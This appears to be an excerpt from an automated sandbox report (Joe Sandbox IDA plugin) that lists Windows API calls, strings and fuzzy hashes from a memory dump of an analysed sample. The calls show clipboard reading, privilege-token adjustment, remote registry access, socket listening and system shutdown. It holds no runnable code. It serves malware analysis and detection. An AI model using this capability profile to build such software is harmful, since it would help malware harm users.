                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E609E4
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongNamePath_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2514874351-0
                                                                                                          • Opcode ID: 481aaa969aded0c7f0e0d622faf3a5ca83cca5b89b07ada0c787be6fe0b8be4e
                                                                                                          • Instruction ID: c544843cb4cdf1a72138feef27ffb2e584eb8a58e7a8da34a7df6857686deb08
                                                                                                          • Opcode Fuzzy Hash: 481aaa969aded0c7f0e0d622faf3a5ca83cca5b89b07ada0c787be6fe0b8be4e
                                                                                                          • Instruction Fuzzy Hash: B6E086329002285BC721969C9C05FEE77DDDB89691F0442F7FC0CE7204D960AC858691
                                                                                                          APIs
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00EA4D31
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
APIs
  • Part of subcall function 00EA384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00EA3959,00000000,00000000,?,00E905DB,00EF8070,00000002,?,?), ref: 00EA38CA
• WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00E905DB,00EF8070,00000002,?,?,?,00000000), ref: 00EA3967
APIs
• CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00EA3E7D,?,?,?), ref: 00EA3F0D
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00E906E6,00000000,00000000,00000000), ref: 00E542BF
APIs
• GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
APIs
• GetLastError.KERNEL32(00000002,00000000), ref: 00EAD842
APIs
  • Part of subcall function 00EA4005: FindFirstFileW.KERNEL32(?,?), ref: 00EA407C
  • Part of subcall function 00EA4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00EA40CC
  • Part of subcall function 00EA4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EA40DD
  • Part of subcall function 00EA4005: FindClose.KERNEL32(00000000), ref: 00EA40F4
• GetLastError.KERNEL32 ref: 00EAC292
APIs
• CloseHandle.KERNEL32(?,?,00000000,00E82F8B), ref: 00E542EF
APIs
  • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00ECD208
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ECD249
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00ECD28E
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ECD2B8
• SendMessageW.USER32 ref: 00ECD2E1
• _wcsncpy.LIBCMT ref: 00ECD359
• GetKeyState.USER32(00000011), ref: 00ECD37A
• GetKeyState.USER32(00000009), ref: 00ECD387
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ECD39D
• GetKeyState.USER32(00000010), ref: 00ECD3A7
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ECD3D0
• SendMessageW.USER32 ref: 00ECD3F7
• SendMessageW.USER32(?,00001030,?,00ECB9BA), ref: 00ECD4FD
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00ECD513
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00ECD526
• SetCapture.USER32(?), ref: 00ECD52F
• ClientToScreen.USER32(?,?), ref: 00ECD594
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00ECD5A1
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00ECD5BB
• ReleaseCapture.USER32 ref: 00ECD5C6
• GetCursorPos.USER32(?), ref: 00ECD600
• ScreenToClient.USER32(?,?), ref: 00ECD60D
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00ECD669
• SendMessageW.USER32 ref: 00ECD697
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00ECD6D4
• SendMessageW.USER32 ref: 00ECD703
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00ECD724
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 00ECD733
• GetCursorPos.USER32(?), ref: 00ECD753
• ScreenToClient.USER32(?,?), ref: 00ECD760
• GetParent.USER32(?), ref: 00ECD780
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00ECD7E9
• SendMessageW.USER32 ref: 00ECD81A
• ClientToScreen.USER32(?,?), ref: 00ECD878
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00ECD8A8
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00ECD8D2
• SendMessageW.USER32 ref: 00ECD8F5
                                                                                                          • ClientToScreen.USER32(?,?), ref: 00ECD947
                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00ECD97B
                                                                                                            • Part of subcall function 00E429AB: GetWindowLongW.USER32(?,000000EB), ref: 00E429BC
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ECDA17
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                          • API String ID: 3977979337-4164748364
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E99399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E993E3
                                                                                                            • Part of subcall function 00E99399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E99410
                                                                                                            • Part of subcall function 00E99399: GetLastError.KERNEL32 ref: 00E9941D
                                                                                                          • _memset.LIBCMT ref: 00E98F71
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E98FC3
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E98FD4
                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E98FEB
                                                                                                          • GetProcessWindowStation.USER32 ref: 00E99004
                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00E9900E
                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E99028
                                                                                                            • Part of subcall function 00E98DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E98F27), ref: 00E98DFE
                                                                                                            • Part of subcall function 00E98DE9: CloseHandle.KERNEL32(?,?,00E98F27), ref: 00E98E10
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                          • String ID: $default$winsta0
                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(00ED0980), ref: 00EB465C
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EB466A
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 00EB4672
                                                                                                          • CloseClipboard.USER32 ref: 00EB467E
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EB469A
                                                                                                          • CloseClipboard.USER32 ref: 00EB46A4
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EB46B9
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00EB46C6
                                                                                                          • GetClipboardData.USER32(00000001), ref: 00EB46CE
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EB46DB
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EB470F
                                                                                                          • CloseClipboard.USER32 ref: 00EB481F
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 3222323430-0
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EAF5F9
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF60E
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF625
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00EAF637
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00EAF651
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EAF669
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF674
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EAF690
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF6B7
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF6CE
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAF6E0
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00EFB578), ref: 00EAF6FE
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAF708
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF715
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF727
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*$S
                                                                                                          • API String ID: 1803514871-3360721001
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EACDD0
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EACE24
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EACE49
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EACE60
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EACE87
                                                                                                          • __swprintf.LIBCMT ref: 00EACED3
                                                                                                          • __swprintf.LIBCMT ref: 00EACF16
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • __swprintf.LIBCMT ref: 00EACF6A
                                                                                                            • Part of subcall function 00E638C8: __woutput_l.LIBCMT ref: 00E63921
                                                                                                          • __swprintf.LIBCMT ref: 00EACFB8
                                                                                                            • Part of subcall function 00E638C8: __flsbuf.LIBCMT ref: 00E63943
                                                                                                            • Part of subcall function 00E638C8: __flsbuf.LIBCMT ref: 00E6395B
                                                                                                          • __swprintf.LIBCMT ref: 00EAD007
                                                                                                          • __swprintf.LIBCMT ref: 00EAD056
                                                                                                          • __swprintf.LIBCMT ref: 00EAD0A5
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 3953360268-2428617273
                                                                                                          APIs
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC0FB3
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ED0980,00000000,?,00000000,?,?), ref: 00EC1021
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EC1069
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EC10F2
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00EC1412
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EC141F
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                          • API String ID: 536824911-966354055
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EAF756
• _wcscmp.LIBCMT ref: 00EAF76B
• _wcscmp.LIBCMT ref: 00EAF782
  • Part of subcall function 00EA4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EA4890
• FindNextFileW.KERNEL32(00000000,?), ref: 00EAF7B1
• FindClose.KERNEL32(00000000), ref: 00EAF7BC
• FindFirstFileW.KERNEL32(*.*,?), ref: 00EAF7D8
• _wcscmp.LIBCMT ref: 00EAF7FF
• _wcscmp.LIBCMT ref: 00EAF816
• SetCurrentDirectoryW.KERNEL32(?), ref: 00EAF828
• SetCurrentDirectoryW.KERNEL32(00EFB578), ref: 00EAF846
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAF850
• FindClose.KERNEL32(00000000), ref: 00EAF85D
• FindClose.KERNEL32(00000000), ref: 00EAF86F
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*$j
APIs
  • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E98E3C
  • Part of subcall function 00E98E20: GetLastError.KERNEL32(?,00E98900,?,?,?), ref: 00E98E46
  • Part of subcall function 00E98E20: GetProcessHeap.KERNEL32(00000008,?,?,00E98900,?,?,?), ref: 00E98E55
  • Part of subcall function 00E98E20: HeapAlloc.KERNEL32(00000000,?,00E98900,?,?,?), ref: 00E98E5C
  • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E98E73
  • Part of subcall function 00E98EBD: GetProcessHeap.KERNEL32(00000008,00E98916,00000000,00000000,?,00E98916,?), ref: 00E98EC9
  • Part of subcall function 00E98EBD: HeapAlloc.KERNEL32(00000000,?,00E98916,?), ref: 00E98ED0
  • Part of subcall function 00E98EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E98916,?), ref: 00E98EE1
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E98931
• _memset.LIBCMT ref: 00E98946
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E98965
• GetLengthSid.ADVAPI32(?), ref: 00E98976
• GetAce.ADVAPI32(?,00000000,?), ref: 00E989B3
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E989CF
• GetLengthSid.ADVAPI32(?), ref: 00E989EC
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E989FB
• HeapAlloc.KERNEL32(00000000), ref: 00E98A02
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E98A23
• CopySid.ADVAPI32(00000000), ref: 00E98A2A
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E98A5B
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E98A81
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E98A95
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
APIs
  • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC0B0C
  • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
  • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EC0BAB
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EC0C43
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EC0E82
• RegCloseKey.ADVAPI32(00000000), ref: 00EC0E8F
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
APIs
• __swprintf.LIBCMT ref: 00EA4451
• __swprintf.LIBCMT ref: 00EA445E
  • Part of subcall function 00E638C8: __woutput_l.LIBCMT ref: 00E63921
• FindResourceW.KERNEL32(?,?,0000000E), ref: 00EA4488
• LoadResource.KERNEL32(?,00000000), ref: 00EA4494
• LockResource.KERNEL32(00000000), ref: 00EA44A1
• FindResourceW.KERNEL32(?,?,00000003), ref: 00EA44C1
• LoadResource.KERNEL32(?,00000000), ref: 00EA44D3
• SizeofResource.KERNEL32(?,00000000), ref: 00EA44E2
• LockResource.KERNEL32(?), ref: 00EA44EE
• CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EA454F
Similarity
• API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
• String ID:
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
APIs
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EAFA83
• FindClose.KERNEL32(00000000), ref: 00EAFB96
  • Part of subcall function 00E452B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E452E6
• Sleep.KERNEL32(0000000A), ref: 00EAFAB3
• _wcscmp.LIBCMT ref: 00EAFAC7
• _wcscmp.LIBCMT ref: 00EAFAE2
• FindNextFileW.KERNEL32(?,?), ref: 00EAFB80
Similarity
• API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
• String ID: *.*
APIs
  • Part of subcall function 00E99399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E993E3
  • Part of subcall function 00E99399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E99410
  • Part of subcall function 00E99399: GetLastError.KERNEL32 ref: 00E9941D
• ExitWindowsEx.USER32(?,00000000), ref: 00EA57B4
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                          • API String ID: 2234035333-194228
                                                                                                          • Opcode ID: 58487948c2be2336107472c68b33d07be3f04edd9a602f81f74c4142807ad04f
                                                                                                          • Instruction ID: 17f77c342c6d44a4b21b949c1399302f06bc626f639142744218b01d1f0ecaf6
                                                                                                          • Opcode Fuzzy Hash: 58487948c2be2336107472c68b33d07be3f04edd9a602f81f74c4142807ad04f
                                                                                                          • Instruction Fuzzy Hash: 8D01D433651712EEE728A264EC8ABBA7698EB0A744F24252BFD13FA0D2DA507C008550
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EB69C7
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB69D6
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EB69F2
                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00EB6A01
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB6A1B
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00EB6A2F
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279440585-0
                                                                                                          • Opcode ID: 4f31da9d2d4924ea755d4d2f51a08ddba22858a1fd01af853f057b292500f8ba
                                                                                                          • Instruction ID: c05f1c0539f8ef7ac8b20e79358acbd16170346a0fbb6c28b90fc1a7a77d4f33
                                                                                                          • Opcode Fuzzy Hash: 4f31da9d2d4924ea755d4d2f51a08ddba22858a1fd01af853f057b292500f8ba
                                                                                                          • Instruction Fuzzy Hash: 9D21CE756002009FCB00EF64E989BAEB7E9EF44724F14955AF956BB3E1CB30AD05CB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E41DD6
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00E41E2A
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00E41E3D
                                                                                                            • Part of subcall function 00E4166C: DefDlgProcW.USER32(?,00000020,?), ref: 00E416B4
                                                                                                          Similarity
                                                                                                          • API ID: ColorProc$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3744519093-0
                                                                                                          • Opcode ID: 25768e8d016fe6e80d33cc269d92c851162855e5662d1525c6a4ef8d7fb75480
                                                                                                          • Instruction ID: ed38253c54438bbbf0cf94c89ce232494e7ea9a1368732465539cb0b5bb8750d
                                                                                                          • Opcode Fuzzy Hash: 25768e8d016fe6e80d33cc269d92c851162855e5662d1525c6a4ef8d7fb75480
                                                                                                          • Instruction Fuzzy Hash: 46A157B4509604BAEE38AB29BC49FBB35DDDF4130AF25B18EF506F5181CB219C82D275
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EAC329
                                                                                                          • _wcscmp.LIBCMT ref: 00EAC359
                                                                                                          • _wcscmp.LIBCMT ref: 00EAC36E
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EAC37F
                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EAC3AF
                                                                                                          Similarity
                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 2387731787-0
                                                                                                          • Opcode ID: 506ff1d39ac3c3300187b714a31621f9949f7a05b65cd89a0f3adfb3b072da84
                                                                                                          • Instruction ID: 1527d064cc048c3133a3a38ac3615419ee747e860c125cd0384dd382a9307493
                                                                                                          • Opcode Fuzzy Hash: 506ff1d39ac3c3300187b714a31621f9949f7a05b65cd89a0f3adfb3b072da84
                                                                                                          • Instruction Fuzzy Hash: 30519C75A046028FC714DF68D490EAAB7E4EF4E314F20565DE966AB3A1DB30BD08CB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EB8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EB84A0
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EB6E89
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB6EB2
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EB6EEB
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB6EF8
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00EB6F0C
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 99427753-0
                                                                                                          • Opcode ID: 1a376eee5274695e731784e5b9c116cc9f837c1cc9eb4a7e05fba7f4c22aa3e2
                                                                                                          • Instruction ID: 967e5e29d295783cd85de0774eb144d719575a5e8ba0af74567ec9ae77be56be
                                                                                                          • Opcode Fuzzy Hash: 1a376eee5274695e731784e5b9c116cc9f837c1cc9eb4a7e05fba7f4c22aa3e2
                                                                                                          • Instruction Fuzzy Hash: 8941D0B6B00200AFDB10AF64EC86F7E77E8DB44714F049459FA56BB3D2DA749D008BA1
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: 9a5ca5678412448528c67a1f382c2467e64e83c4c29f97b9550b796325b29760
                                                                                                          • Instruction ID: bb010b7dc35e1ad7dcf8c3aa0a7225e218c49f08249efd5a4b2b1fbfd2782b37
                                                                                                          • Opcode Fuzzy Hash: 9a5ca5678412448528c67a1f382c2467e64e83c4c29f97b9550b796325b29760
                                                                                                          • Instruction Fuzzy Hash: 0B1104737019119FE7212F27AD84F6E7B98EF84720F04612EF846F7241CB31E9428AA0
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime__swprintf
                                                                                                          • String ID: %.3d$WIN_XPe
                                                                                                          • API String ID: 2070861257-2409531811
                                                                                                          • Opcode ID: c6da3442b616dfd91dfccbb33dcc1db8b006be0af31b4558a74dc2ca4ddd6472
                                                                                                          • Instruction ID: f1403d1350175712646b7cd88471987abf6ee103122c989e8d1a41a457d134b0
                                                                                                          • Opcode Fuzzy Hash: c6da3442b616dfd91dfccbb33dcc1db8b006be0af31b4558a74dc2ca4ddd6472
                                                                                                          • Instruction Fuzzy Hash: 92D01272844108EEC748ABA0DC45EFA737CEB04300F142852F54EB2040E335874C9B22
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EB1ED6,00000000), ref: 00EB2AAD
                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EB2AE4
                                                                                                          Similarity
                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 599397726-0
                                                                                                          • Opcode ID: f6b12165ee017718a99e1c3149c5781b85a7ef501d88281c8f1e51aa2464f26d
                                                                                                          • Instruction ID: 49cdcad1fbbf25a9b3672ea8e14f102bf08825f5c94947e458aa41e18b735c64
                                                                                                          • Opcode Fuzzy Hash: f6b12165ee017718a99e1c3149c5781b85a7ef501d88281c8f1e51aa2464f26d
                                                                                                          • Instruction Fuzzy Hash: 8A419271600209BFEB21DE95DC85EFBB7ECEF40758F10506EF705B6141EA71AE419660
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                            • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E993E3
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E99410
                                                                                                          • GetLastError.KERNEL32 ref: 00E9941D
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 1922334811-0
                                                                                                          • Opcode ID: e1267e7a835508e911653a21c3e19d228a484da761035492ab30a370e6b3ced2
                                                                                                          • Instruction ID: f0280b3f27be1ef9017f636b035af93fcdce2c3b9b5e9f7c5812f1b86ee17d2b
                                                                                                          • Opcode Fuzzy Hash: e1267e7a835508e911653a21c3e19d228a484da761035492ab30a370e6b3ced2
                                                                                                          • Instruction Fuzzy Hash: 4F116DB1514205BFDB28DF58EC85E2BB7F8EB44750B24852EF459A2241EA70AC41CA60
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EA42FF
                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00EA433C
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EA4345
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
